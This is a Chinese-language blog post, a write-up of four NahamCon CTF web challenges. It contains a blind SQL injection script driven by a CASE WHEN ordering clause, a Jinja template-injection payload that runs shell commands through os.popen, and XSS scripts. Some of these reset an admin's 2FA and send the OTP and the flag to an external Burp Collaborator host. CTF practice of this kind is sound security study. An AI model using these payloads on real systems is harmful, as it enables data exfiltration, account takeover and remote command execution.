<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="paixiaoxing">
    
    <title>
        
            NahamCTF复现 |
        
        paixiaoxing&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/paidaxing.jpg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066CC","avatar":"/images/paidaxing.jpg","favicon":"/images/paidaxing.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"“请用绝对的理智压制不该有的情绪。”"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":true}}},"local_search":{"enable":false,"preload":false},"code_copy":{"enable":true,"style":"mac"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"3.4.5"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/paidaxing.jpg">
                </a>
            
            <a class="logo-title" href="/">
                paixiaoxing&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                TAGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                LINKS
                            </a>
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">TAGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">LINKS</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">NahamCTF复现</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/paidaxing.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">paixiaoxing</span>
                        
                            <span class="author-label">Lv5</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-05-02 14:55:26</span>
        <span class="mobile">2022-05-02 14:55</span>
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/NahamCTF/">NahamCTF</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="NahamCTF复现"><a href="#NahamCTF复现" class="headerlink" title="NahamCTF复现"></a>NahamCTF复现</h1><h2 id="Flaskmetal炼金术士"><a href="#Flaskmetal炼金术士" class="headerlink" title="Flaskmetal炼金术士"></a>Flaskmetal炼金术士</h2><p>看了源码发现我们猜测最终执行的语句应该是<strong>select flag from flag</strong></p>
<p>而且漏洞点在这里：</p>
<p><img src="/2022/05/02/NahamCTF%E5%A4%8D%E7%8E%B0/3.png" alt="image-20220503075116094"></p>
<p>在页面测试的时候发现，在我们搜索的时候是存在两个post参数的，一个是search，另一个是order</p>
<p>search很好理解，就直接是搜索字符，而后面的order是判断其排序方式的，虽然在页面上不可更改但当我们抓包的时候发现这里其实是可以按自己的方式更改的，这里可以插入语句，一般的查询语句是肯定不行的，我们需要通过一种排序方式，判断回显来进行盲注：</p>
<p>可以利用case when then这样的方式来执行我们的判断正确的方式，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://challenge.nahamcon.com:30596&#x27;</span></span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">        <span class="string">&#x27;search&#x27;</span>:<span class="string">&#x27;a&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;order&#x27;</span>:<span class="string">f&#x27;(select case when (select substr(flag, 1, 1 from flag) = f then atomic_number else name end)&#x27;</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">io = requests.post(url,data)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(io.text)</span><br></pre></td></tr></table></figure>

<p>这样他就会以不同的判断正确错误的方式来排序这个列表，我们只需要判断第一位就行了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> ascii_lowercase</span><br><span class="line"></span><br><span class="line">URL = <span class="string">&#x27;http://challenge.nahamcon.com:30596&#x27;</span></span><br><span class="line">arr = ascii_lowercase + <span class="string">&#x27;&#123;&#125;_&#x27;</span></span><br><span class="line">sql = <span class="string">&quot;CASE WHEN (SELECT SUBSTR(flag,&#123;&#125;,1) FROM flag)=&#x27;&#123;&#125;&#x27; THEN atomic_number ELSE symbol END&quot;</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">index = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> arr:</span><br><span class="line">        response = requests.post(URL, data=&#123; <span class="string">&#x27;search&#x27;</span>: <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;order&#x27;</span>: sql.<span class="built_in">format</span>(index, char) &#125;)</span><br><span class="line">        name = response.text.split(<span class="string">&#x27;\n&#x27;</span>)[<span class="number">74</span>]</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;Li&#x27;</span> <span class="keyword">in</span> name:</span><br><span class="line">            flag += char</span><br><span class="line">            index += <span class="number">1</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br><span class="line">    <span class="keyword">if</span> flag[-<span class="number">1</span>] == <span class="string">&#x27;&#125;&#x27;</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<h2 id="Hacker-Ts"><a href="#Hacker-Ts" class="headerlink" title="Hacker Ts"></a>Hacker Ts</h2><p>直接让我们在Tshirts上面添加我们写入的语句，没有过滤任何的信息，而且在进入题目的时候很明显的右上角有一个admin</p>
<p>点进去发现权限不够，所以判断这题就是ssrf，利用利用html语言来访问/admin页面带回输出即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;div id=&#x27;suff&#x27;&gt;a&lt;/div&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">	x = new XMLHttpRequest();</span><br><span class="line">	x.open(&#x27;GET&#x27;,&#x27;http://localhost:5000/admin&#x27;,false);</span><br><span class="line">	x.send();</span><br><span class="line">	document.getElementById(&#x27;suff&#x27;).innerHTML=x.responseText;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>即可在衣服上带回flag</p>
<h2 id="Deafcon"><a href="#Deafcon" class="headerlink" title="Deafcon"></a>Deafcon</h2><p>在页面随意登录的时候发现在服务器回显了我们输入的内容，简单测试发现了一个ssti漏洞</p>
<p>但是好像以符号起手的都不行，看到师傅们的wp发现原来可以用request.application这种方法来开头寻找到我们需要的库</p>
<p>通过寻找他的全局变量来找，最后在builtins库里面可以调用import直接调用os库试试</p>
<p>发现括号不能用，可以用unicode的类括号，可以实现括号的作用。但是还是无法正确运行，最后发现在解析的时候只要@符号的左边用双引号括起来，那么其中的语句就会正确运行（不知道为啥）</p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&#123;&#123;request.application[&#x27;__globals__&#x27;].__builtins__.__import__﹙&#x27;os&#x27;﹚.popen﹙&#x27;cat flag.txt&#x27;﹚.read﹙﹚&#125;&#125;&quot;@qq.com</span><br></pre></td></tr></table></figure>

<h2 id="two-or-one"><a href="#two-or-one" class="headerlink" title="two or one"></a>two or one</h2><p>进入是一个登录框，我们注册之后会显示一个二维码，需要用Authenticator扫描拿到她的码然后后续的操作都会用到她</p>
<p>我们可以输入我们的秘密，然后可以在页面点击查看，抓包发现</p>
<p><img src="/2022/05/02/NahamCTF%E5%A4%8D%E7%8E%B0/4.png" alt="1"></p>
<p>在/show_secret页面post输入otp码以及secret的id就可以看到我们的回显（我这里输入的别的）</p>
<p>猜测id是flag的id是1，2</p>
<p>但是当我们输入1，2的时候发现没有这个secret那么也就是说我们需要拿到admin的otp码然后根据这个去访问它的show_secret路由，然后带出flag</p>
<p>寻找注入点，</p>
<p>发现在setting页面有一个反馈，而且他是没有经过任何过滤的，经过测试发现它以admin身份对我们输入的语言进行解析执行，可以用html语言来带回我们需要的数据，我们只需要让他重新Reset2FA 然后让它把语句带出来即可(我这里用bp带出)</p>
<p>xsspayload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">const xhttp = new XMLHttpRequest();</span><br><span class="line">xhttp.onload = function() &#123;</span><br><span class="line">  document.location=&quot;http://6lsoqc0y9bovtq8a76acilca41asyh.burpcollaborator.net?otp=&quot;+this.responseText;</span><br><span class="line">&#125;</span><br><span class="line">xhttp.open(&quot;POST&quot;, &quot;http://challenge.nahamcon.com:32330/reset2fa&quot;);</span><br><span class="line">xhttp.send();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/05/02/NahamCTF%E5%A4%8D%E7%8E%B0/5.png" alt="1"></p>
<p>发现生成的otp码</p>
<p><code>qr &quot;otpauth://totp/Fort Knox:admin?secret=N57MWYXNMECMLZO7&amp;issuer=Fort Knox&quot;</code>执行语句生成二维码扫描拿到admin用户的otp码</p>
<p>后面就可以进行带出flag了</p>
<p>因为只需要猜测admin用户的secretid即可，所以直接让它访问show_secret然后输入我们拿到的otp码查看id为1的试试</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"></span></span><br><span class="line"><span class="javascript"><span class="keyword">const</span> xhttp = <span class="keyword">new</span> XMLHttpRequest();</span></span><br><span class="line"><span class="javascript">xhttp.onload = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">  <span class="built_in">document</span>.location=<span class="string">&quot;http://chx5s8h3nrcmos61ij304qbfg6myan.burpcollaborator.net?flag=&quot;</span>+<span class="built_in">this</span>.responseText;</span></span><br><span class="line"><span class="javascript">&#125;</span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> json = &#123;<span class="string">&quot;otp&quot;</span>:<span class="string">&quot;671813&quot;</span>,<span class="string">&quot;secretId&quot;</span>:<span class="string">&quot;1&quot;</span>&#125;;</span></span><br><span class="line"><span class="javascript">xhttp.open(<span class="string">&quot;POST&quot;</span>, <span class="string">&quot;http://challenge.nahamcon.com:32498/show_secret&quot;</span>);</span></span><br><span class="line"><span class="javascript">xhttp.setRequestHeader(<span class="string">&#x27;Content-Type&#x27;</span>, <span class="string">&#x27;application/json&#x27;</span>);</span></span><br><span class="line"><span class="javascript">xhttp.send(<span class="built_in">JSON</span>.stringify(json));</span></span><br><span class="line"><span class="javascript">xhttp.send();</span></span><br><span class="line"><span class="javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2022/05/02/NahamCTF%E5%A4%8D%E7%8E%B0/6.png" alt="1"></p>
<p>发现flag被带回</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>Post title：NahamCTF复现</li>
        <li>Post author：paixiaoxing</li>
        <li>Create time：2022-05-02 14:55:26</li>
        <li>
            Post link：https://keep.xpoet.cn/2022/05/02/NahamCTF复现/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/NahamCTF/">#NahamCTF</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2022/05/05/CISCN-giftbox/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">CISCN-giftbox</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/04/27/DASCTF%E9%98%B2%E7%96%AB%E6%8C%91%E6%88%98%E8%B5%9B%E5%A4%8D%E7%8E%B0/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">DASCTF防疫挑战赛复现</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span>
              -
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">paixiaoxing</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        Visitor Count&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        Totalview&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.5</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#NahamCTF%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">NahamCTF复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Flaskmetal%E7%82%BC%E9%87%91%E6%9C%AF%E5%A3%AB"><span class="nav-number">1.1.</span> <span class="nav-text">Flaskmetal炼金术士</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Hacker-Ts"><span class="nav-number">1.2.</span> <span class="nav-text">Hacker Ts</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Deafcon"><span class="nav-number">1.3.</span> <span class="nav-text">Deafcon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#two-or-one"><span class="nav-number">1.4.</span> <span class="nav-text">two or one</span></a></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>





    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
